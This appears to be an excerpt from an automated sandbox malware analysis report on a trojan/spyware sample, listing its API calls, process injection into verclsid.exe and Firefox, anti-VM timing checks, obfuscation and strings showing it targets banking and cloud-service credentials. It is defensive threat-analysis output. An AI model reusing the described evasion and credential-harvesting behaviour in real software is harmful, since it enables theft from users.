Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_045D2B80 NtQueryInformationFile, 7_2_045D2B80
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_045D3010 NtOpenDirectoryObject, 7_2_045D3010
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_045D3090 NtSetValueKey, 7_2_045D3090
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_045D3D70 NtOpenThread, 7_2_045D3D70
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_045D3D10 NtOpenProcessToken, 7_2_045D3D10
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_003D8F80 NtCreateFile, 7_2_003D8F80
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_003D90F0 NtReadFile, 7_2_003D90F0
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_003D91F0 NtDeleteFile, 7_2_003D91F0
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_003D9290 NtClose, 7_2_003D9290
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_003D93F0 NtAllocateVirtualMemory, 7_2_003D93F0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 0_2_004031A3 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_004031A3
Source: C:\Users\user\Desktop\Anfrage_244384.exe File created: C:\Windows\resources\soenderbro.ini
Source: C:\Windows\SysWOW64\verclsid.exe Code function: String function: 045D5130 appears 58 times
Source: C:\Windows\SysWOW64\verclsid.exe Code function: String function: 045E7E54 appears 102 times
Source: C:\Windows\SysWOW64\verclsid.exe Code function: String function: 0460EA12 appears 86 times
Source: C:\Windows\SysWOW64\verclsid.exe Code function: String function: 0458B970 appears 280 times
Source: C:\Windows\SysWOW64\verclsid.exe Code function: String function: 0461F290 appears 105 times
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: String function: 346EEA12 appears 82 times
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: String function: 3466B970 appears 280 times
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: String function: 346C7E54 appears 103 times
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: String function: 346B5130 appears 58 times
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: String function: 346FF290 appears 103 times
Source: Anfrage_244384.exe Static PE information: invalid certificate
Source: Anfrage_244384.exe, 00000004.00000003.2992504596.0000000034403000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Anfrage_244384.exe
Source: Anfrage_244384.exe, 00000004.00000002.3092495841.00000000043DF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameverclsid.exej% vs Anfrage_244384.exe
Source: Anfrage_244384.exe, 00000004.00000003.2995103933.00000000345BF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Anfrage_244384.exe
Source: Anfrage_244384.exe, 00000004.00000002.3092495841.0000000004423000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameverclsid.exej% vs Anfrage_244384.exe
Source: Anfrage_244384.exe, 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Anfrage_244384.exe
Source: Anfrage_244384.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/11@2/2
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 0_2_004043E6 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_004043E6
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 0_2_004020CD CoCreateInstance,MultiByteToWideChar, 0_2_004020CD
Source: C:\Users\user\Desktop\Anfrage_244384.exe File created: C:\Users\user\AppData\Roaming\secretaryships
Source: C:\Users\user\Desktop\Anfrage_244384.exe File created: C:\Users\user\AppData\Local\Temp\nsgA5D8.tmp
Source: Anfrage_244384.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Anfrage_244384.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Anfrage_244384.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: verclsid.exe, 00000007.00000003.3288960229.0000000000855000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3361368137.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000003.3288960229.0000000000876000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3361368137.0000000000876000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000003.3291082475.0000000000881000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: C:\Users\user\Desktop\Anfrage_244384.exe File read: C:\Users\user\Desktop\Anfrage_244384.exe
Source: unknown Process created: C:\Users\user\Desktop\Anfrage_244384.exe "C:\Users\user\Desktop\Anfrage_244384.exe"
Source: C:\Users\user\Desktop\Anfrage_244384.exe Process created: C:\Users\user\Desktop\Anfrage_244384.exe "C:\Users\user\Desktop\Anfrage_244384.exe"
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe Process created: C:\Windows\SysWOW64\verclsid.exe "C:\Windows\SysWOW64\verclsid.exe"
Source: C:\Windows\SysWOW64\verclsid.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Anfrage_244384.exe Process created: C:\Users\user\Desktop\Anfrage_244384.exe "C:\Users\user\Desktop\Anfrage_244384.exe"
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe Process created: C:\Windows\SysWOW64\verclsid.exe "C:\Windows\SysWOW64\verclsid.exe"
Source: C:\Windows\SysWOW64\verclsid.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: riched20.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: usp10.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: msls31.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: powrprof.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: umpdc.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\verclsid.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: Anfrage_244384.exe Static file information: File size 1240824 > 1048576
Source: Anfrage_244384.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: mshtml.pdb source: Anfrage_244384.exe, 00000004.00000001.2596303421.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: dptLotHBnXg.exe, 00000006.00000000.3013372549.00000000009CE000.00000002.00000001.01000000.00000009.sdmp, dptLotHBnXg.exe, 00000008.00000000.3174453120.00000000009CE000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: wntdll.pdbUGP source: Anfrage_244384.exe, 00000004.00000003.2992504596.00000000342E0000.00000004.00000020.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000003.2995103933.0000000034492000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000003.3106086622.00000000043B3000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000007.00000003.3098948159.0000000004205000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Anfrage_244384.exe, Anfrage_244384.exe, 00000004.00000003.2992504596.00000000342E0000.00000004.00000020.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000003.2995103933.0000000034492000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, verclsid.exe, 00000007.00000003.3106086622.00000000043B3000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000007.00000003.3098948159.0000000004205000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: verclsid.pdbGCTL source: Anfrage_244384.exe, 00000004.00000002.3092495841.00000000043DF000.00000004.00000020.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3092495841.000000000441D000.00000004.00000020.00020000.00000000.sdmp, dptLotHBnXg.exe, 00000006.00000002.3361641901.000000000140E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdbUGP source: Anfrage_244384.exe, 00000004.00000001.2596303421.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source: Binary string: verclsid.pdb source: Anfrage_244384.exe, 00000004.00000002.3092495841.00000000043DF000.00000004.00000020.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3092495841.000000000441D000.00000004.00000020.00020000.00000000.sdmp, dptLotHBnXg.exe, 00000006.00000002.3361641901.000000000140E000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: Yara match File source: 00000000.00000002.2597198603.0000000004A03000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA, 0_2_10001A5D
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 0_2_10002D20 push eax; ret 0_2_10002D4E
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346427FA pushad ; ret 4_2_346427F9
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3464225F pushad ; ret 4_2_346427F9
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3464283D push eax; iretd 4_2_34642858
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346709AD push ecx; mov dword ptr [esp], ecx 4_2_346709B6
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_045909AD push ecx; mov dword ptr [esp], ecx 7_2_045909B6
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_003C0B37 push ds; iretd 7_2_003C0B40
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_003CEC80 push edx; retn 134Bh 7_2_003CED83
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_003C4FF9 push 00000065h; retf 7_2_003C500E
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_003C7306 pushad ; ret 7_2_003C7304
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_003C74CD push esp; retf 7_2_003C74D1
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_003CBFC7 push eax; iretd 7_2_003CBFCC
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_048B5491 push ds; retf 7_2_048B549F
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_048B659E push 00000051h; iretd 7_2_048B65B2
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_048B5564 push eax; retf 7_2_048B5566
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_048BC6E5 push ecx; iretd 7_2_048BC6AD
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_048BC60A push ecx; iretd 7_2_048BC6AD
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_048BC67D push ecx; iretd 7_2_048BC6AD
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_048B47B3 push edi; ret 7_2_048B47BA
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_048BD02C push FFFFFFF7h; ret 7_2_048BD02F
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_048BB2A4 pushfd ; ret 7_2_048BB305
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_048B6258 push esp; ret 7_2_048B6259
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_048B737C pushfd ; iretd 7_2_048B73BC
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_048BBD56 pushfd ; retf 7_2_048BBD57
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_048B5E2D push ecx; retf 7_2_048B5E39
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_048B5E46 push ebp; ret 7_2_048B5E61
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_048BC813 pushfd ; ret 7_2_048BC814
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_048BC869 push edi; iretd 7_2_048BC86A
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_048B596F push 0000002Ch; ret 7_2_048B5978
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_048B0BAE push edx; iretd 7_2_048B0BBD
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_048B0BBE push FFFFFFFDh; iretd 7_2_048B0BC0
Source: C:\Users\user\Desktop\Anfrage_244384.exe File created: C:\Users\user\AppData\Local\Temp\nsgA6C3.tmp\System.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Anfrage_244384.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Anfrage_244384.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\verclsid.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\verclsid.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\verclsid.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\verclsid.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\verclsid.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Anfrage_244384.exe API/Special instruction interceptor: Address: 4D102F6
Source: C:\Users\user\Desktop\Anfrage_244384.exe API/Special instruction interceptor: Address: 38D02F6
Source: C:\Windows\SysWOW64\verclsid.exe API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\verclsid.exe API/Special instruction interceptor: Address: 7FFDB442D7E4
Source: C:\Windows\SysWOW64\verclsid.exe API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\verclsid.exe API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\verclsid.exe API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\verclsid.exe API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\verclsid.exe API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\SysWOW64\verclsid.exe API/Special instruction interceptor: Address: 7FFDB442DA44
Source: C:\Users\user\Desktop\Anfrage_244384.exe RDTSC instruction interceptor: First address: 4CD3731 second address: 4CD3731 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1534B1992Bh 0x00000004 test bh, ah 0x00000006 cmp ebx, ecx 0x00000008 jc 00007F1534B19905h 0x0000000a test dl, bl 0x0000000c inc ebp 0x0000000d test edx, 1E38E0C7h 0x00000013 inc ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Anfrage_244384.exe RDTSC instruction interceptor: First address: 3893731 second address: 3893731 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15350784ABh 0x00000004 test bh, ah 0x00000006 cmp ebx, ecx 0x00000008 jc 00007F1535078485h 0x0000000a test dl, bl 0x0000000c inc ebp 0x0000000d test edx, 1E38E0C7h 0x00000013 inc ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_347416A6 rdtsc 4_2_347416A6
Source: C:\Users\user\Desktop\Anfrage_244384.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsgA6C3.tmp\System.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe API coverage: 0.2 %
Source: C:\Windows\SysWOW64\verclsid.exe API coverage: 2.7 %
Source: C:\Windows\SysWOW64\verclsid.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 0_2_00405665 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_00405665
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 0_2_0040270B FindFirstFileA, 0_2_0040270B
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 0_2_004060C7 FindFirstFileA,FindClose, 0_2_004060C7
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_003CC460 FindFirstFileW,FindNextFileW,FindClose, 7_2_003CC460
Source: 02-E8420l.7.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: 02-E8420l.7.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: 02-E8420l.7.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: 02-E8420l.7.dr Binary or memory string: discord.comVMware20,11696487552f
Source: verclsid.exe, 00000007.00000002.3365232559.0000000007752000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: merica.comVMware20,11696487552|UE
Source: 02-E8420l.7.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: 02-E8420l.7.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: Anfrage_244384.exe, 00000004.00000003.2993262650.00000000043CD000.00000004.00000020.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3092148007.00000000043CD000.00000004.00000020.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000003.2992975055.00000000043CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 02-E8420l.7.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: 02-E8420l.7.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: 02-E8420l.7.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: 02-E8420l.7.dr Binary or memory string: tasks.office.comVMware20,11696487552o
Source: 02-E8420l.7.dr Binary or memory string: global block list test formVMware20,11696487552
Source: verclsid.exe, 00000007.00000002.3365232559.0000000007752000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware20,11696487552u
Source: Anfrage_244384.exe, 00000004.00000002.3092148007.0000000004378000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW8J=
Source: verclsid.exe, 00000007.00000002.3365232559.0000000007752000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,116
Source: 02-E8420l.7.dr Binary or memory string: AMC password management pageVMware20,11696487552
Source: verclsid.exe, 00000007.00000002.3361368137.0000000000805000.00000004.00000020.00020000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362395237.0000000000BEF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 02-E8420l.7.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: 02-E8420l.7.dr Binary or memory string: dev.azure.comVMware20,11696487552j
Source: 02-E8420l.7.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: 02-E8420l.7.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: 02-E8420l.7.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: verclsid.exe, 00000007.00000002.3365232559.0000000007752000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,1169648E
Source: verclsid.exe, 00000007.00000002.3365232559.0000000007752000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ebrokers.co.inVMware20,11696487552d
Source: 02-E8420l.7.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
